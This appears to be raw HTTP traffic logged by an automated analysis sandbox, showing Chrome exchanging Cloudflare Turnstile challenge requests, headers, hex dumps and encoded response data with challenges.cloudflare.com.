                                                      2024-03-05 13:23:19 UTC1369INData Raw: 51 46 49 77 48 51 78 56 4e 79 5a 5a 53 54 73 6f 57 6c 77 32 56 30 38 79 58 79 31 67 52 55 5a 49 52 32 70 55 4a 47 63 2b 63 45 5a 4e 55 47 46 74 53 32 64 50 64 48 52 58 61 56 74 62 63 45 42 33 66 56 35 42 51 58 42 6d 57 45 4f 48 5a 6b 56 49 62 6f 4a 67 54 5a 4e 6c 67 47 68 67 67 5a 5a 70 62 6f 68 35 58 59 75 51 6a 6d 43 50 63 70 64 58 66 48 43 5a 6d 4a 4b 48 64 4b 69 6e 70 48 42 76 6b 4a 39 39 71 70 47 67 6b 5a 69 6d 68 35 57 63 71 6f 65 5a 6f 4b 36 54 6e 61 53 78 67 59 43 4a 73 72 71 56 77 71 66 4f 6a 74 48 4e 78 70 53 2f 6f 49 32 31 6f 35 43 53 31 35 6a 61 76 4c 58 4f 77 73 4b 35 6d 2b 54 47 76 5a 2f 59 79 73 47 37 78 73 37 46 76 37 72 53 79 63 4c 4f 31 73 33 47 77 74 72 52 79 75 7a 65 31 63 33 4b 34 74 6e 52 42 65 62 64 31 66 6a 71 34 64 6a 70 37 65 63
                                                      Data Ascii: QFIwHQxVNyZZSTsoWlw2V08yXy1gRUZIR2pUJGc+cEZNUGFtS2dPdHRXaVtbcEB3fV5BQXBmWEOHZkVIboJgTZNlgGhggZZpboh5XYuQjmCPcpdXfHCZmJKHdKinpHBvkJ99qpGgkZimh5WcqoeZoK6TnaSxgYCJsrqVwqfOjtHNxpS/oI21o5CS15javLXOwsK5m+TGvZ/YysG7xs7Fv7rSycLO1s3GwtrRyuze1c3K4tnRBebd1fjq4djp7ec
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 56 68 55 47 43 68 63 57 45 73 66 47 43 49 36 4c 42 39 6b 56 56 78 58 52 6a 51 31 51 6d 39 64 61 46 45 37 4b 32 38 30 50 6b 56 6a 53 58 56 49 5a 7a 64 72 58 6a 68 35 54 6c 46 76 56 46 57 45 57 6b 4a 70 51 34 70 56 61 55 68 72 68 48 4a 4c 58 6d 36 41 55 56 68 75 65 32 6c 55 64 31 52 34 58 6f 4a 2b 67 48 65 51 68 48 79 58 67 58 5a 2f 66 49 6c 2f 5a 34 47 5a 6e 49 52 76 68 36 70 2f 6f 36 4b 6e 69 34 57 79 6c 33 5a 34 67 61 71 79 6a 62 71 66 78 6f 62 4a 78 62 36 4d 74 35 37 45 75 36 58 54 72 36 6e 54 30 4c 61 74 6a 37 4b 36 73 5a 50 4d 76 72 57 76 75 73 4b 35 73 36 37 47 76 62 62 46 79 63 58 6f 79 75 79 6e 33 61 76 51 77 63 2b 77 31 4f 6e 5a 31 73 54 48 78 38 76 4a 36 39 76 67 2b 4d 37 78 30 50 37 32 32 4f 6a 46 42 64 58 76 78 73 72 49 37 38 33 4e 34 66 50 52
                                                      Data Ascii: VhUGChcWEsfGCI6LB9kVVxXRjQ1Qm9daFE7K280PkVjSXVIZzdrXjh5TlFvVFWEWkJpQ4pVaUhrhHJLXm6AUVhue2lUd1R4XoJ+gHeQhHyXgXZ/fIl/Z4GZnIRvh6p/o6Kni4Wyl3Z4gaqyjbqfxobJxb6Mt57Eu6XTr6nT0Latj7K6sZPMvrWvusK5s67GvbbFycXoyuyn3avQwc+w1OnZ1sTHx8vJ69vg+M7x0P722OjFBdXvxsrI783N4fPR
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 6b 65 57 45 4a 42 4e 6c 4e 63 4a 44 4a 64 55 69 52 56 62 54 5a 6b 58 53 68 4e 52 55 42 4b 5a 6c 4e 46 51 7a 41 32 64 6c 4a 39 55 31 35 59 59 6e 52 39 52 58 46 6c 50 6f 69 46 57 6d 57 4d 69 57 5a 6c 6b 6d 61 41 5a 45 79 51 55 57 69 58 6b 48 5a 6d 6e 4a 69 4d 64 61 46 32 6b 48 69 6a 65 6d 46 34 71 4b 53 59 64 47 69 73 6d 61 4b 66 73 35 79 6e 71 6e 61 73 6c 70 64 34 6a 4a 68 76 72 33 57 33 75 72 47 59 72 36 36 7a 74 70 50 4b 68 49 71 38 77 62 36 47 30 4d 53 52 6b 4e 4f 4c 31 72 62 42 75 71 33 44 7a 38 79 39 6b 61 72 53 73 5a 7a 50 32 62 66 42 76 4e 7a 66 36 71 79 33 78 4f 66 6b 71 64 33 6d 30 50 44 70 35 2f 47 30 38 64 6e 5a 38 50 4b 34 79 4c 76 77 37 66 62 7a 30 66 48 42 33 39 51 46 78 64 7a 73 79 51 72 5a 38 38 72 52 7a 50 50 52 30 75 58 33 31 64 58 70 2b
                                                      Data Ascii: keWEJBNlNcJDJdUiRVbTZkXShNRUBKZlNFQzA2dlJ9U15YYnR9RXFlPoiFWmWMiWZlkmaAZEyQUWiXkHZmnJiMdaF2kHijemF4qKSYdGismaKfs5ynqnaslpd4jJhvr3W3urGYr66ztpPKhIq8wb6G0MSRkNOL1rbBuq3Dz8y9karSsZzP2bfBvNzf6qy3xOfkqd3m0PDp5/G08dnZ8PK4yLvw7fbz0fHB39QFxdzsyQrZ88rRzPPR0uX31dXp+
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 68 4a 69 42 49 58 43 4a 68 51 44 67 39 4a 69 31 4c 51 57 5a 77 62 6c 56 46 5a 30 74 4e 52 32 35 50 53 45 42 79 56 49 4e 68 64 6c 64 68 58 48 78 45 51 6c 78 4b 69 32 35 74 53 6c 46 6d 58 4a 52 56 54 57 42 51 6c 47 61 4d 5a 70 35 35 61 33 61 6a 6b 5a 5a 36 66 34 4e 2f 58 36 65 70 67 58 32 63 6a 33 39 38 6e 37 47 56 67 4a 65 6e 73 4c 53 62 6d 5a 79 75 73 37 2b 4c 72 72 69 68 6a 4c 6d 30 74 62 79 33 79 37 69 2f 68 63 6e 45 71 36 6d 62 70 4c 43 48 30 72 61 6c 32 61 36 5a 74 70 76 59 74 4a 2b 37 75 4c 79 37 70 62 7a 6e 75 37 76 45 70 73 48 4f 70 2b 37 67 34 74 50 63 77 39 37 6c 76 38 76 47 31 64 66 37 7a 4f 33 39 2b 37 66 4e 39 51 44 55 30 50 45 4a 32 39 54 72 41 67 72 59 42 73 6a 65 41 42 49 52 35 4f 44 72 42 65 72 31 42 64 7a 54 35 76 50 30 31 78 51 45 41 4e
                                                      Data Ascii: hJiBIXCJhQDg9Ji1LQWZwblVFZ0tNR25PSEByVINhdldhXHxEQlxKi25tSlFmXJRVTWBQlGaMZp55a3ajkZZ6f4N/X6epgX2cj398n7GVgJensLSbmZyus7+LrrihjLm0tby3y7i/hcnEq6mbpLCH0ral2a6ZtpvYtJ+7uLy7pbznu7vEpsHOp+7g4tPcw97lv8vG1df7zO39+7fN9QDU0PEJ29TrAgrYBsjeABIR5ODrBer1BdzT5vP01xQEAN
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 51 6a 64 70 4b 6b 6c 51 4c 32 78 57 61 30 78 6d 65 45 39 61 4e 44 74 70 66 46 47 41 66 48 52 31 67 30 5a 38 55 48 75 41 6a 46 6c 32 6a 6f 35 47 69 59 31 79 67 59 6c 32 6c 30 35 57 69 58 5a 61 64 46 42 38 63 56 79 4d 58 71 52 77 64 58 6d 47 70 58 4e 39 6f 70 57 65 65 4a 75 61 6e 33 74 39 71 70 43 4b 6b 5a 69 6c 64 58 52 39 70 71 36 4a 74 70 76 43 67 73 58 42 75 6f 69 7a 6e 70 32 6c 70 49 58 45 75 36 58 43 77 71 75 69 6e 72 50 46 74 37 62 63 71 4e 7a 5a 75 70 33 62 75 4a 72 66 33 73 37 46 6f 4b 61 79 75 64 65 38 76 65 7a 43 71 74 47 72 38 76 48 4e 30 61 2b 7a 75 66 4c 49 2b 38 37 38 38 76 58 4d 33 2f 50 78 34 77 44 2b 38 66 72 55 39 2f 62 36 79 51 51 4e 2f 67 4c 64 43 2b 38 58 31 68 6f 57 44 39 77 49 36 66 4c 35 31 79 45 5a 45 50 6b 59 42 50 30 6e 45 77 67
                                                      Data Ascii: QjdpKklQL2xWa0xmeE9aNDtpfFGAfHR1g0Z8UHuAjFl2jo5GiY1ygYl2l05WiXZadFB8cVyMXqRwdXmGpXN9opWeeJuan3t9qpCKkZildXR9pq6JtpvCgsXBuoiznp2lpIXEu6XCwquinrPFt7bcqNzZup3buJrf3s7FoKayude8vezCqtGr8vHN0a+zufLI+8788vXM3/Px4wD+8frU9/b6yQQN/gLdC+8X1hoWD9wI6fL51yEZEPkYBP0nEwg
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 6e 56 77 55 6b 35 44 4f 55 6c 7a 4d 6c 35 59 4f 6b 31 67 59 44 74 7a 67 33 4a 31 63 49 42 6b 53 30 64 37 6a 32 68 4f 63 6d 35 77 5a 48 39 51 6b 6f 39 78 6d 47 5a 74 57 49 68 37 58 70 42 74 67 35 64 75 6b 32 4a 78 64 48 4a 2f 67 33 71 63 67 34 78 39 65 35 32 4f 67 49 61 73 70 58 43 55 65 35 32 33 71 4c 53 68 76 4a 47 54 6f 59 43 32 71 49 47 44 74 6f 4f 4a 70 63 4b 64 68 6f 32 72 7a 38 62 51 6b 37 57 6c 78 74 43 70 73 4d 75 5a 6b 62 37 50 6e 72 32 38 32 4b 4b 35 76 4c 50 56 70 63 50 41 35 4d 65 71 77 73 72 50 78 38 4b 2b 39 64 54 47 36 4d 2f 4d 37 65 6d 31 31 64 54 39 34 76 54 57 2f 76 6f 47 30 2b 4d 41 39 67 67 4b 37 76 72 6a 34 66 77 41 30 2f 50 32 47 51 76 77 2b 51 2f 74 48 52 7a 73 46 39 30 50 34 41 48 33 46 67 6f 6b 46 53 45 4f 39 53 41 43 36 2b 4d 63
                                                      Data Ascii: nVwUk5DOUlzMl5YOk1gYDtzg3J1cIBkS0d7j2hOcm5wZH9Qko9xmGZtWIh7XpBtg5duk2JxdHJ/g3qcg4x9e52OgIaspXCUe523qLShvJGToYC2qIGDtoOJpcKdho2rz8bQk7WlxtCpsMuZkb7Pnr282KK5vLPVpcPA5MeqwsrPx8K+9dTG6M/M7em11dT94vTW/voG0+MA9ggK7vrj4fwA0/P2GQvw+Q/tHRzsF90P4AH3FgokFSEO9SAC6+Mc
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 73 78 62 31 64 71 54 6c 5a 56 63 49 4b 45 65 48 39 31 59 6f 46 59 67 58 70 73 62 45 6d 4f 57 58 4e 4b 68 45 78 7a 55 59 4e 5a 68 33 6d 53 64 58 39 57 69 6f 31 68 6e 49 57 53 68 57 39 6c 6b 34 74 64 6f 34 79 58 67 57 68 38 6d 32 32 42 74 71 4e 32 68 62 71 6e 64 6f 6d 2b 6c 37 4b 7a 6b 62 5a 35 74 35 54 42 75 33 2b 70 6d 4b 69 5a 70 49 57 63 71 4b 6d 4a 30 72 4f 73 74 63 4b 32 74 4c 62 63 72 4a 6d 55 76 72 33 69 7a 4c 61 79 35 4b 57 68 73 4f 6d 2b 32 4d 62 4c 33 71 62 63 35 71 33 46 38 37 33 52 78 73 6e 54 7a 72 6d 36 37 4e 65 37 34 64 76 35 7a 66 54 63 32 4c 2f 70 39 50 58 67 42 75 62 66 7a 4e 33 52 37 38 37 31 33 78 4c 31 35 75 6e 7a 31 4e 58 35 2b 39 6b 51 37 51 44 64 45 2f 45 45 34 52 6e 31 43 4f 55 59 37 52 77 4f 4a 77 6f 55 36 68 38 69 39 54 45 61 4a
                                                      Data Ascii: sxb1dqTlZVcIKEeH91YoFYgXpsbEmOWXNKhExzUYNZh3mSdX9Wio1hnIWShW9lk4tdo4yXgWh8m22BtqN2hbqndom+l7KzkbZ5t5TBu3+pmKiZpIWcqKmJ0rOstcK2tLbcrJmUvr3izLay5KWhsOm+2MbL3qbc5q3F873RxsnTzrm67Ne74dv5zfTc2L/p9PXgBubfzN3R78713xL15unz1NX5+9kQ7QDdE/EE4Rn1COUY7RwOJwoU6h8i9TEaJ
                                                      2024-03-05 13:23:19 UTC1369INData Raw: 4b 62 34 46 6b 55 6f 56 78 58 46 47 4c 66 58 64 69 57 57 31 67 55 47 6c 79 63 55 31 6d 5a 59 52 72 6d 70 47 52 62 58 4b 4d 66 57 47 50 6d 4a 56 69 66 4a 53 54 6c 58 56 34 6d 71 47 41 69 57 69 6b 6b 36 78 2b 72 5a 36 42 6a 72 43 6a 6a 5a 4b 72 6c 62 47 61 6c 4c 69 58 67 4a 75 52 6c 5a 2b 65 71 37 32 35 6c 34 44 41 70 4c 6d 6a 73 59 79 68 6b 38 76 4f 77 36 53 6d 76 4e 61 51 70 38 44 59 74 63 48 42 32 4e 75 67 75 4e 71 6c 74 74 69 34 75 4b 47 37 78 39 71 38 33 2b 65 30 79 38 50 31 38 2b 6e 78 30 74 66 62 33 38 76 5a 76 4f 51 41 32 65 58 6c 2f 63 62 68 34 41 50 4c 34 64 67 45 2f 63 34 4f 35 77 63 43 42 39 44 71 35 4e 66 75 36 66 76 39 37 78 58 7a 41 50 44 76 35 68 6e 78 38 2f 66 30 35 78 34 45 4c 53 41 30 4a 75 38 4b 42 2f 62 77 4c 68 54 36 45 66 6f 62 47 50
                                                      Data Ascii: Kb4FkUoVxXFGLfXdiWW1gUGlycU1mZYRrmpGRbXKMfWGPmJVifJSTlXV4mqGAiWikk6x+rZ6BjrCjjZKrlbGalLiXgJuRlZ+eq725l4DApLmjsYyhk8vOw6SmvNaQp8DYtcHB2NuguNqltti4uKG7x9q83+e0y8P18+nx0tfb38vZvOQA2eXl/cbh4APL4dgE/c4O5wcCB9Dq5Nfu6fv97xXzAPDv5hnx8/f05x4ELSA0Ju8KB/bwLhT6EfobGP


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.449759104.17.3.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:20 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1318590694:1709641463:zSaOyPPd1Tt7Y_AdkvJadIWaaVllOPiN8i5OYGFk-_M/85fa6b76cf6e4369/2573fed2a68f8e4 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:20 UTC386INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 05 Mar 2024 13:23:20 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: dP8aJqvbuWgkwmiPQX0x9Q==$eGDHOvjC9i9B7bYywogtXg==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b85ba035e61-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:20 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-03-05 13:23:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.449760104.17.2.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:20 UTC776OUTGET /cdn-cgi/challenge-platform/h/g/i/85fa6b76cf6e4369/1709644999735/5XCbngvQK7ffH2m HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:20 UTC208INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:20 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b85dc9d78d6-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:20 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 34 00 00 00 53 08 02 00 00 00 5f eb b3 5e 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDR4S_^IDAT$IENDB`
                                                      2024-03-05 13:23:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.449761104.17.3.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:20 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/85fa6b76cf6e4369/1709644999735/5XCbngvQK7ffH2m HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:21 UTC208INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:21 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b888b6e1891-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:21 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 34 00 00 00 53 08 02 00 00 00 5f eb b3 5e 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDR4S_^IDAT$IENDB`
                                                      2024-03-05 13:23:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.449762104.17.2.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:21 UTC805OUTGET /cdn-cgi/challenge-platform/h/g/pat/85fa6b76cf6e4369/1709644999741/0fb3a646aa0a887b61a44db8eafd773faaff7031b3776205cabb903351463218/dAp7jUY1dzXr_Hs HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Cache-Control: max-age=0
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:22 UTC152INHTTP/1.1 401 Unauthorized
                                                      Date: Tue, 05 Mar 2024 13:23:21 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      2024-03-05 13:23:22 UTC1374INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 44 37 4f 6d 52 71 6f 4b 69 48 74 68 70 45 32 34 36 76 31 33 50 36 72 5f 63 44 47 7a 64 32 49 46 79 72 75 51 4d 31 46 47 4d 68 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 67
                                                      Data Ascii: www-authenticate: PrivateToken challenge=AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gD7OmRqoKiHthpE246v13P6r_cDGzd2IFyruQM1FGMhgAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=, token-key=MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAg
                                                      2024-03-05 13:23:22 UTC6INData Raw: 31 0d 0a 4a 0d 0a
                                                      Data Ascii: 1J
                                                      2024-03-05 13:23:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.449763104.17.2.1844434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:23 UTC918OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1318590694:1709641463:zSaOyPPd1Tt7Y_AdkvJadIWaaVllOPiN8i5OYGFk-_M/85fa6b76cf6e4369/2573fed2a68f8e4 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 29722
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: 2573fed2a68f8e4
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:23 UTC16384OUTData Raw: 76 5f 38 35 66 61 36 62 37 36 63 66 36 65 34 33 36 39 3d 35 64 34 51 37 38 4b 66 25 32 62 78 34 4b 34 38 2d 7a 6f 75 73 75 53 71 49 4b 47 65 66 7a 4f 75 7a 51 38 77 75 58 75 59 75 65 4a 38 6d 75 4c 75 53 4a 51 75 43 34 4e 75 78 51 4f 64 4b 6b 75 37 51 49 55 77 4b 6e 75 78 57 64 48 34 75 65 34 75 56 71 75 38 39 75 56 65 37 49 4b 73 75 71 56 58 24 75 7a 67 64 75 6f 78 53 59 74 2d 75 6a 51 7a 2d 75 76 52 70 6f 61 55 59 75 34 2b 50 75 67 74 73 76 30 75 7a 2d 59 67 4b 37 75 4b 64 4b 59 33 6e 6f 51 61 71 75 75 36 6e 4b 67 75 5a 61 38 61 75 4c 67 75 76 43 50 55 6c 48 57 6f 75 75 67 35 7a 51 75 69 75 71 77 2b 75 33 43 61 34 67 50 75 30 58 2b 39 2d 67 78 61 75 71 46 48 75 4b 50 75 30 4e 76 6b 58 49 51 43 57 51 4b 7a 2d 34 4b 36 7a 49 51 6b 57 2d 50 75 38 4d 49 49
                                                      Data Ascii: v_85fa6b76cf6e4369=5d4Q78Kf%2bx4K48-zousuSqIKGefzOuzQ8wuXuYueJ8muLuSJQuC4NuxQOdKku7QIUwKnuxWdH4ue4uVqu89uVe7IKsuqVX$uzgduoxSYt-ujQz-uvRpoaUYu4+Pugtsv0uz-YgK7uKdKY3noQaquu6nKguZa8auLguvCPUlHWouug5zQuiuqw+u3Ca4gPu0X+9-gxauqFHuKPu0NvkXIQCWQKz-4K6zIQkW-Pu8MII
                                                      2024-03-05 13:23:23 UTC13338OUTData Raw: 66 4a 68 39 36 2d 4c 48 55 24 75 41 51 76 64 71 4a 4c 2d 7a 4f 78 53 51 6e 44 4c 44 56 51 75 51 7a 34 75 55 75 2d 51 4c 2d 75 52 75 36 51 33 51 4b 6e 75 64 75 4e 75 71 6e 75 65 75 38 5a 53 41 55 72 51 38 70 76 33 75 4a 61 33 75 7a 4e 75 56 75 49 75 71 74 6f 44 4a 4c 41 64 37 51 4b 24 78 36 56 31 51 45 37 35 39 4e 73 2b 75 55 58 24 59 66 61 2b 51 6e 36 41 75 43 31 24 7a 72 75 52 75 57 75 2d 75 71 57 75 66 4a 53 4a 4b 33 4a 6b 75 2d 66 4b 2b 75 50 75 53 4a 4b 50 75 50 75 33 75 7a 68 61 72 6c 37 30 56 39 39 69 4e 78 68 76 6d 77 59 75 38 45 58 41 55 32 42 35 51 4c 34 58 6f 37 37 65 2b 42 61 36 4b 2d 4c 38 47 62 41 64 7a 51 37 58 42 71 6c 37 72 4b 36 49 4e 64 78 36 41 73 67 55 37 2b 63 77 33 61 5a 5a 4b 2b 41 78 30 79 65 6a 69 75 4d 61 6f 53 52 79 65 6f 43 31
                                                      Data Ascii: fJh96-LHU$uAQvdqJL-zOxSQnDLDVQuQz4uUu-QL-uRu6Q3QKnuduNuqnueu8ZSAUrQ8pv3uJa3uzNuVuIuqtoDJLAd7QK$x6V1QE759Ns+uUX$Yfa+Qn6AuC1$zruRuWu-uqWufJSJK3Jku-fK+uPuSJKPuPu3uzharl70V99iNxhvmwYu8EXAU2B5QL4Xo77e+Ba6K-L8GbAdzQ7XBql7rK6INdx6AsgU7+cw3aZZK+Ax0yejiuMaoSRyeoC1
                                                      2024-03-05 13:23:24 UTC327INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:24 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-gen: ujuzl469GjmDUfKSrjLupkT9/MEyNLyK5ROTUR8lCCYeElJHBR/e4wUaBaC9RZVT$nGlaUthL6Ao2tyJLMAhtNA==
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6b9b1a5b42f1-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:24 UTC1042INData Raw: 34 61 36 38 0d 0a 73 35 4b 52 67 70 69 6c 78 36 53 5a 6d 4c 36 53 6e 4d 4b 53 74 73 33 42 74 37 66 4d 31 63 57 6f 7a 4a 37 4a 72 4e 50 45 77 35 2f 57 33 37 65 2f 75 62 36 2f 70 75 4c 52 36 63 7a 67 36 38 66 48 37 4e 6a 32 32 73 6e 4f 30 37 62 79 34 66 33 4f 38 4d 4c 62 43 41 4c 48 79 4f 6f 42 33 2b 76 72 42 4d 33 72 44 67 59 4b 46 68 51 5a 34 51 6f 47 46 2f 33 37 39 52 49 57 49 76 63 64 42 52 62 79 46 66 67 53 2f 68 30 47 48 68 73 72 45 68 41 55 49 52 55 41 44 43 59 43 4b 69 67 33 48 68 77 67 4e 53 45 4d 47 44 45 4f 4e 6a 31 44 4b 69 67 66 50 6b 4d 48 4b 6b 41 68 50 51 56 45 4a 41 67 33 4a 69 74 4f 45 30 38 2b 54 69 35 59 4d 54 68 44 5a 54 73 2f 4e 44 6f 33 5a 30 4a 58 52 69 6c 69 51 57 4a 63 59 58 4e 4b 56 53 38 32 4f 54 68 75 4f 48 6c 56 62 54 78 72 50
